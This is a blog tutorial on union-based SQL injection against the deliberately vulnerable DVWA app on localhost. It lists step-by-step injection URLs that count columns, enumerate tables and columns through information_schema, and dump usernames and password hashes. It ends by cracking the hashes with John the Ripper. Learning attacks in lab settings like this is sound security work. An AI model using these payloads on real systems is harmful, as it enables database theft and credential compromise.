Union Based Injection using John the Ripper

Posted on : July 29, 2017 By
Union Based Injection using John the Ripper
Hacking Articles 

Union Based Injection using John the Ripper

System used :: Kali Linux

Testing on localhost :: 127.0.0.1/login.php (DVWA)

  • Open Xampp on Linux and Start MySQL and Apache Server


  • Open Iceweasel and write 127. 0 . 0.1/login.php

Login to the Application

Username : admin , Password : password

    • Setup the security level from ‘High’ to ‘Low’ under DVWA security

    • Setup the Database under Setup tab

    • Click on SQL injection to begin testing

  • Enter 1 in the User ID Field

User sees the GET method

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

  • Check for Exception Handling

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1’&Submit=Submit#

  • Checking using the True Conditions

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=$’ or ‘1’=’1&Submit=Submit#

The above injection reveal the user id’s in the userdb database.

  • Checking for number of columns, returning the SQL query

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1’ order by 1–+&Submit=Submit#

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1’ order by 5–+&Submit=Submit#

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1’ order by 3–+&Submit=Submit#

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1’ order by 2–+&Submit=Submit#


This shows the number of columns are 2

  • Using ‘Union Select’ to consolidate 2 columns

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1’ union select 1, 2–+&Submit=Submit#

  • For vulnerable columns, make id=-1

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1’ union select 1, 2–+&Submit=Submit#

  • Check for version

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1’ union select null, version()–+&Submit=Submit#

  • To search for database, version and user

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1’ union select concat(database(), ‘ ‘, version()), user()–+&Submit=Submit#

  • To search for corresponding details

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1’ union select null, table_name from information_schema.tables –+&Submit=Submit#

  • For checking specific table, example ‘users’ , in the particular database, here

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1’ union select null, table_name from information_schema.tables  where table_name = “users%”–+&Submit=Submit#

This SQL query will display all the tables consisting of keyword “users”

  • Under ‘users’ table, checking for column names

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1’ union select null, column_name from information_schema.columns  where table_name = “users”–+&Submit=Submit#

  • Checking and consolidation all the details of all the columns:

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1’ union select concat(user_id,’ ‘,first_name,’ ‘,last_name,’ ‘avatar),concat(user,’ ‘,password) from users–+&Submit=Submit#

    • Copy the users & passwords and save them in <user>:<password> format in “password.txt” file under /Home


    • Using John the Ripper application for cracking the password, with format md5

Hence we have user names & their corresponding passwords.

This is tutorial is by lucideus (rahul tyagi ) Images Quality may not good so that post can load in a proper time ,stay tuned for more tutorials

Read More :Special Interview of India’s Famous White Hat Hacker Rahul Tyagi | Lucideus

Leave a Reply

Your email address will not be published. Required fields are marked *